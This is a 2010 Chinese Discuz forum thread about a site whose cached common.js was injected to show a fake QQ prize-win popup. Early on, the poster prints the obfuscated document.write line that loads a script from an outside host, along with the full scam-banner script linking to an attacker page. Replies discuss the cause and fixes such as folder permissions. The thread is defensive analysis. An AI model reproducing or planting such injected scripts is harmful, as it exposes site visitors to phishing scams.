找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 2360|回复: 13

我今天也发现论坛弹中奖消息了,论坛js代码被纂改了

[复制链接]

63

主题

899

回帖

7388

积分

上尉

UID
60
回帖
899
主题
63
积分
7388
阅读权限
150
注册时间
2006-5-21
最后登录
2023-8-5
在线时间
509 小时
发表于 2010-6-24 17:15 | 显示全部楼层 |阅读模式
今天上论坛的时候,果然看到了那个qq中奖消息,最后我发现在论坛
<script src="forumdata/cache/common.js?I0Z" type="text/javascript"></script>
其中这段被挂马了,在这段js代码中嵌套了另外一段js代码
document.write ('<SCRIPT src="http://%77%77%77%2E%71%71%63%6E%32%30%31%30%2E%63%6F%6D/%77%65%62/%6A%73/%64%74%72%65%65%2E%6A%73"></script>');

http://%77%77%77%2E%71%71%63%6E%32%30%31%30%2E%63%6F%6D/%77%65%62/%6A%73/%64%74%72%65%65%2E%6A%73这个地址是加密的,实际上是打开了另一个js文件http://111.122.210.3/css/b.js ,而在http://111.122.210.3/css/b.js中,就是最终弹出的那个虚假中奖消息了。代码如下:


var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+6*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
var qq_etewidth = 254;
var qq_eteheight = 156;
var qq_banner_filename = "http://111.122.210.3/css/qq1.gif";
var qq_gotoUrl = "http://111.122.210.3/css/tz.asp";
document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>")
document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>")
document.write("</div>")
var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body;
var adst = document.getElementById("eteUnionUpFloat").style;
adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px";
function moveR() {
adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px";
}
var objTimer=setInterval("moveR();", 100);
function Clo**(){
adst.display='none';
}
function ete_closediv()
{
document.getElementById('eteUnionUpFloat').style.visibility='hidden';
if(objTimer) window.clearInterval(objTimer)
}document.writeln("<BGSOUND balance=0 src=\"http://111.122.210.3/css/system.wav\" volume=-240>");
}


而那个IP地址111.122.210.3是贵州的

评分

参与人数 1人气 +30 收起 理由
疯猪 + 30

查看全部评分

841

主题

1万

回帖

9万

积分

站长

UID
1
回帖
12020
主题
841
积分
99007
阅读权限
255
注册时间
2006-5-20
最后登录
2025-7-30
在线时间
10117 小时
发表于 2010-6-24 17:27 | 显示全部楼层
问题就在那儿,
可不晓得是从哪儿来的.
更不知道如何医治.
签名啦~
回复

使用道具 举报

217

主题

2万

回帖

8万

积分

副管理员

UID
16
回帖
20079
主题
217
积分
83806
阅读权限
245
注册时间
2006-5-20
最后登录
2021-10-15
在线时间
3462 小时
发表于 2010-6-24 17:31 | 显示全部楼层
都好久了
神即道 道法自然 如来
回复

使用道具 举报

353

主题

6万

回帖

17万

积分

中将

伊不进单刀莫为奇

UID
626
回帖
67789
主题
353
积分
173224
阅读权限
195
注册时间
2006-6-21
最后登录
2021-9-27
在线时间
3770 小时
发表于 2010-6-24 17:39 | 显示全部楼层
问题就在那儿,
可不晓得是从哪儿来的.
更不知道如何医治.
川渝秦缘 发表于 2010-6-24 17:27



    有些网站啊...
    您最好少看哦...
回复

使用道具 举报

19

主题

2534

回帖

9523

积分

热血青年

UID
33979
回帖
2534
主题
19
积分
9523
阅读权限
10
注册时间
2010-1-12
最后登录
2020-11-30
在线时间
277 小时
发表于 2010-6-24 18:13 | 显示全部楼层
就是啊
怎么治呢?
念了十几年书,想起来还是幼儿园比较好混!
回复

使用道具 举报

63

主题

899

回帖

7388

积分

上尉

UID
60
回帖
899
主题
63
积分
7388
阅读权限
150
注册时间
2006-5-21
最后登录
2023-8-5
在线时间
509 小时
 楼主| 发表于 2010-6-24 18:25 | 显示全部楼层
检查一下 forumdata文件夹的权限呢,要不就设置为只读
回复

使用道具 举报

63

主题

899

回帖

7388

积分

上尉

UID
60
回帖
899
主题
63
积分
7388
阅读权限
150
注册时间
2006-5-21
最后登录
2023-8-5
在线时间
509 小时
 楼主| 发表于 2010-6-24 18:30 | 显示全部楼层
论坛目录取消everyone的写入权限看看
回复

使用道具 举报

54

主题

5612

回帖

54万

积分

大元帅

额~~~~~~~没啥!

UID
18409
回帖
5612
主题
54
积分
546795
阅读权限
210
注册时间
2009-1-6
最后登录
2025-3-26
在线时间
1521 小时
发表于 2010-6-24 19:10 | 显示全部楼层
建议老大把 风雨燕双飞  聘为论坛技术管理。一看就比大伙专业得多! 风雨燕双飞 应该是个站长吧?
别人待我如何,是我的因果;我待人如何,是我的修行.
回复

使用道具 举报

960

主题

3万

回帖

12万

积分

副管理员

UID
10
回帖
36027
主题
960
积分
122370
阅读权限
245
注册时间
2006-5-20
最后登录
2021-4-25
在线时间
5602 小时
发表于 2010-6-24 20:15 | 显示全部楼层
有些网站啊...
    您最好少看哦...
〢.◆譽ēr. 发表于 2010-6-24 17:39



    和这个无关的,是论坛DZ语言的一个漏洞~
我家住在黄土高坡..
大风从坡上刮过..........
不管是.......李宇春........... 还是曾轶可...
都是我的哥,,,我的哥,,,,,,,,,,,,,,,, .
回复

使用道具 举报

12

主题

387

回帖

2940

积分

预备军官

UID
31714
回帖
387
主题
12
积分
2940
阅读权限
120
注册时间
2009-9-21
最后登录
2012-6-9
在线时间
38 小时
发表于 2010-6-24 21:58 | 显示全部楼层
应该处理一下
回复

使用道具 举报

63

主题

899

回帖

7388

积分

上尉

UID
60
回帖
899
主题
63
积分
7388
阅读权限
150
注册时间
2006-5-21
最后登录
2023-8-5
在线时间
509 小时
 楼主| 发表于 2010-6-24 23:12 | 显示全部楼层
建议老大把 风雨燕双飞  聘为论坛技术管理。一看就比大伙专业得多! 风雨燕双飞 应该是个站长吧?
月光冷舞 发表于 2010-6-24 19:10



    抬举我了,是个站长没错,技术上我也很菜
回复

使用道具 举报

54

主题

5612

回帖

54万

积分

大元帅

额~~~~~~~没啥!

UID
18409
回帖
5612
主题
54
积分
546795
阅读权限
210
注册时间
2009-1-6
最后登录
2025-3-26
在线时间
1521 小时
发表于 2010-6-25 11:55 | 显示全部楼层
抬举我了,是个站长没错,技术上我也很菜
风雨燕双飞 发表于 2010-6-24 23:12



    呵呵!一定要为咱简阳本土论坛扎起哟!你有那个实力哈
别人待我如何,是我的因果;我待人如何,是我的修行.
回复

使用道具 举报

283

主题

1万

回帖

6万

积分

精英会员

小帅哥的帅。。

UID
10742
回帖
12451
主题
283
积分
62852
阅读权限
220
注册时间
2008-5-15
最后登录
2021-1-24
在线时间
4103 小时
发表于 2010-6-25 18:42 | 显示全部楼层
论坛人才大有人在
比如楼上这位

没有本事咋个能当元帅呢
而且还是大元帅
阅读权限和老大的一样
光是这个就很厉害了
简阳小帅数码 电话:13982977909
电脑维修销售 手机维修销售  监控安装维修  
回复

使用道具 举报

6833

主题

7万

回帖

28万

积分

站长

UID
66
回帖
73850
主题
6833
积分
283148
阅读权限
255
注册时间
2006-5-22
最后登录
2025-8-2
在线时间
10816 小时
发表于 2010-6-27 01:57 | 显示全部楼层
谢谢楼主
个人微信 33239 6666
提供简阳论坛访问相关帮助
也欢迎加好友后申请进入论坛微信群
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

不良和违法信息举报邮箱:80411235@qq.com|营业执照|网站法律顾问|Archiver|手机版|小黑屋|简阳论坛 ( 蜀ICP备2021016404号-1 )

关注简阳论坛
官方公众号

GMT+8, 2025-8-2 23:20 , Processed in 0.040020 second(s), 23 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表